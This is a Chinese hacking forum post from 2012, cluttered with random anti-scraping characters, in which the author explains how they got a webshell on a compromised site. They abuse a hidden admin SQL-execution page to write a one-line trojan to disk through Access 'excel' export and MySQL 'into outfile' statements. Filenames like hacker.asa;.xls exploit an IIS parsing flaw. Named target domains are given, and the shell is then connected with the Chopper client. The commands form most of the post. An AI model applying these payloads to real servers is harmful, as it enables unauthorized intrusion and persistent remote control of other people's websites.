好不容易进了后台,发现啥上传啊。备份啊多木有。$ ~0 ^: o( n% A( K
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的4 o q3 s5 }( U+ z. w
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,- Z0 u# t$ w5 \) y! O4 w
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:: _1 j9 l9 r# F0 O1 C" {
1.create table cmd (a varchar(50)) D' w5 w2 Q9 d' y4 j/ }
2.insert into cmd (a) values (‘‘)) L7 T! ~3 g, o0 g' ^4 e" K
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd# }, K, ]9 ?/ Y' o
(把表cmd的内容导出为物理路径的一个EXCEL文件): o3 A) G; m+ o C7 p
4.drop table cmd
# M% C: z6 r) D+ J# M利用IIS的BUG成功拿到了WEBSHELL。
0 b" ?+ c- J, @9 M- |0 }- S& N" d9 n. Z4 k6 N/ k% w' |6 @
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
" M/ @$ g$ H$ u& P, o% s2 P, q7 {8 L4 ?$ M# N6 d! E
SQL语句意思解释:3 o. S" ~$ Z9 y! v. b2 g( @
第一句$ G+ f3 H5 m) T9 X% M1 U) `: M
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50, G4 L" @4 L/ x/ [ X
6 m5 e% Q3 \- I# F7 V- r 第二句) q2 k; `. W6 T0 h
在表cmd的a字段插入一句话木马, N8 Q! } [) l: k u; k
第三句
- F+ s8 v3 ?" L1 O* i 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件, u. ?% P% V( J [3 w
3 y/ e% [$ I. @( e 第四句
) ^/ n9 {' t' `$ I1 X$ ? 删除建立的cmd表* Z9 R6 X, l6 ~4 S* P
! h7 M, j% I! S' Y8 D% x" \/ Q# k 以下内容为测试:1 f& r5 F3 t3 V
Access利用后台SQL执行命令功能导出WebShell:
8 `# ]' S. s6 W6 u0 _+ U7 o 这个更简单:8 j, U2 R9 Z! q+ j `$ ^, K
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
5 A$ u% T; e( ?- {2 w% w; n J2 I4 M$ ` 或者
- J; l1 N0 s+ \# A [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]. S h# i3 t, f* u$ B
0 d3 n* K) [7 P 后台有执行SQL语句功能(vote为已知表段)
8 N( {+ }. B5 O% c: Y; f/ l 希望对大家有所帮助拿shell的又一个思路
& d: i7 z! A7 y |
发表于 2012-9-13 17:53:58
收藏
支持
反对